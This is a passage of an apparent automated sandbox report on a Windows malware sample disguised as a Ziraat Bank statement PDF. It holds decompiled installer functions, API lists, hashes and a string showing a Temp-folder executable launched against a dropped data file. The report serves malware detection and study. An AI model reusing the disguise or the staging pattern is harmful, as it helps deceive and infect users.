                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                    • String ID: $M$N
                                                    • API String ID: 2564846305-813528018
                                                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                    0x00404795
                                                    0x004048c2
                                                    0x0040491f
                                                    0x00404923
                                                    0x004049f0
                                                    0x004049f2
                                                    0x004049f2
                                                    0x004049f8
                                                    0x004049f8
                                                    0x004049fb
                                                    0x00000000
                                                    0x00404a02
                                                    0x00404931
                                                    0x00404937
                                                    0x00404941
                                                    0x0040494c
                                                    0x0040494f
                                                    0x00404952
                                                    0x0040495d
                                                    0x00404960
                                                    0x00404967
                                                    0x00404974
                                                    0x00404985
                                                    0x0040498b
                                                    0x00404993
                                                    0x004049a1
                                                    0x004049a7
                                                    0x004049a7
                                                    0x00404967
                                                    0x004049b1
                                                    0x00000000
                                                    0x004049bc
                                                    0x004049c0
                                                    0x004049d0
                                                    0x004049d0
                                                    0x004049d6
                                                    0x004049e2
                                                    0x004049e2
                                                    0x00000000
                                                    0x004049e6
                                                    0x004049b1
                                                    0x004048cd
                                                    0x00000000
                                                    0x004048df
                                                    0x004048e4
                                                    0x004048ea
                                                    0x00000000
                                                    0x00000000
                                                    0x00404913
                                                    0x00404915
                                                    0x0040491a
                                                    0x00000000
                                                    0x0040491a
                                                    0x004048cd
                                                    0x0040479b
                                                    0x0040479e
                                                    0x004047a3
                                                    0x004047b4
                                                    0x004047b4
                                                    0x004047bc
                                                    0x004047bf
                                                    0x004047c3
                                                    0x004047c6
                                                    0x004047ca
                                                    0x004047cd
                                                    0x004047d0
                                                    0x004047d3
                                                    0x004047da
                                                    0x004047dc
                                                    0x004047dc
                                                    0x004047e6
                                                    0x004047f3
                                                    0x004047fd
                                                    0x00404802
                                                    0x00404805
                                                    0x0040480a
                                                    0x00404821
                                                    0x00404828
                                                    0x0040483b
                                                    0x0040483e
                                                    0x00404852
                                                    0x00404859
                                                    0x0040485e
                                                    0x00404863
                                                    0x00404863
                                                    0x00404871
                                                    0x0040487f
                                                    0x00404891
                                                    0x00404896
                                                    0x004048a6
                                                    0x004048a8
                                                    0x00000000

                                                    APIs
                                                    • CheckDlgButton.USER32 ref: 00404821
                                                    • GetDlgItem.USER32 ref: 00404835
                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                    • GetSysColor.USER32(?), ref: 00404863
                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                    • lstrlenW.KERNEL32(?), ref: 00404884
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                    • GetDlgItem.USER32 ref: 004048FF
                                                    • SendMessageW.USER32(00000000), ref: 00404906
                                                    • GetDlgItem.USER32 ref: 00404931
                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                    • SetCursor.USER32(00000000), ref: 00404985
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                    • SetCursor.USER32(00000000), ref: 004049A1
                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                    Strings
                                                    • "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj, xrefs: 00404960
                                                    • N, xrefs: 0040491F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                    • String ID: "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj$N
                                                    • API String ID: 3103080414-118278765
                                                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                    0x004062ae
                                                    0x004062b7
                                                    0x004062be
                                                    0x004062c8
                                                    0x004062dc
                                                    0x00406304
                                                    0x0040630b
                                                    0x0040630f
                                                    0x00406313
                                                    0x00406333
                                                    0x0040633a
                                                    0x00406344
                                                    0x00406351
                                                    0x00406356
                                                    0x0040635b
                                                    0x0040635f
                                                    0x0040636e
                                                    0x00406370
                                                    0x0040637d
                                                    0x00406381
                                                    0x0040641c
                                                    0x00000000
                                                    0x00406397
                                                    0x004063a4
                                                    0x004063c8
                                                    0x004063cc
                                                    0x004063eb
                                                    0x004063ef
                                                    0x004063ef
                                                    0x004063f1
                                                    0x004063fa
                                                    0x00406405
                                                    0x00406410
                                                    0x00406416
                                                    0x00000000
                                                    0x00406416
                                                    0x004063ce
                                                    0x004063d1
                                                    0x004063dc
                                                    0x004063d8
                                                    0x004063da
                                                    0x004063db
                                                    0x004063db
                                                    0x004063e3
                                                    0x004063e5
                                                    0x00000000
                                                    0x004063e5
                                                    0x004063af
                                                    0x004063b5
                                                    0x00000000
                                                    0x004063b5
                                                    0x00406381
                                                    0x0040635f
                                                    0x004062de
                                                    0x004062e9
                                                    0x004062f2
                                                    0x004062f6
                                                    0x00000000
                                                    0x00000000
                                                    0x004062f6
                                                    0x00406427

                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                    • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                    • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                    • wsprintfA.USER32 ref: 0040632D
                                                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                    • GlobalFree.KERNEL32 ref: 00406416
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                    • API String ID: 2171350718-2295842750
                                                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                    0x0040100a
                                                    0x00401039
                                                    0x00401047
                                                    0x0040104d
                                                    0x00401051
                                                    0x0040105b
                                                    0x00401061
                                                    0x00401064
                                                    0x004010f3
                                                    0x00401089
                                                    0x0040108c
                                                    0x004010a6
                                                    0x004010bd
                                                    0x004010cc
                                                    0x004010cf
                                                    0x004010d5
                                                    0x004010d9
                                                    0x004010e4
                                                    0x004010ed
                                                    0x004010ef
                                                    0x004010ef
                                                    0x00401100
                                                    0x00401105
                                                    0x0040110d
                                                    0x00401110
                                                    0x00401112
                                                    0x00401118
                                                    0x0040111f
                                                    0x00401126
                                                    0x00401130
                                                    0x00401142
                                                    0x00401156
                                                    0x00401160
                                                    0x00401165
                                                    0x00401165
                                                    0x00401110
                                                    0x0040116e
                                                    0x00000000
                                                    0x00401178
                                                    0x00401010
                                                    0x00401013
                                                    0x00401015
                                                    0x0040101f
                                                    0x0040101f
                                                    0x00000000

                                                    APIs
                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                    • GetClientRect.USER32 ref: 0040105B
                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                    • FillRect.USER32 ref: 004010E4
                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                    • String ID: F
                                                    • API String ID: 941294808-1304234792
                                                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                    0x004066a5
                                                    0x004066a5
                                                    0x004066a5
                                                    0x004066ab
                                                    0x004066b0
                                                    0x004066c1
                                                    0x004066c1
                                                    0x004066c9
                                                    0x004066ca
                                                    0x004066cb
                                                    0x004066cc
                                                    0x004066cf
                                                    0x004066d7
                                                    0x004066d9
                                                    0x004066ea
                                                    0x004066ed
                                                    0x004066ed
                                                    0x004066f1
                                                    0x004066f7
                                                    0x004066fa
                                                    0x004068d5
                                                    0x004068d5
                                                    0x004068e0
                                                    0x004068ec
                                                    0x004068ec
                                                    0x00000000
                                                    0x00406700
                                                    0x00406705
                                                    0x0040671a
                                                    0x0040671b
                                                    0x00406721
                                                    0x004068b3
                                                    0x004068c1
                                                    0x004068c4
                                                    0x004068c4
                                                    0x004068b5
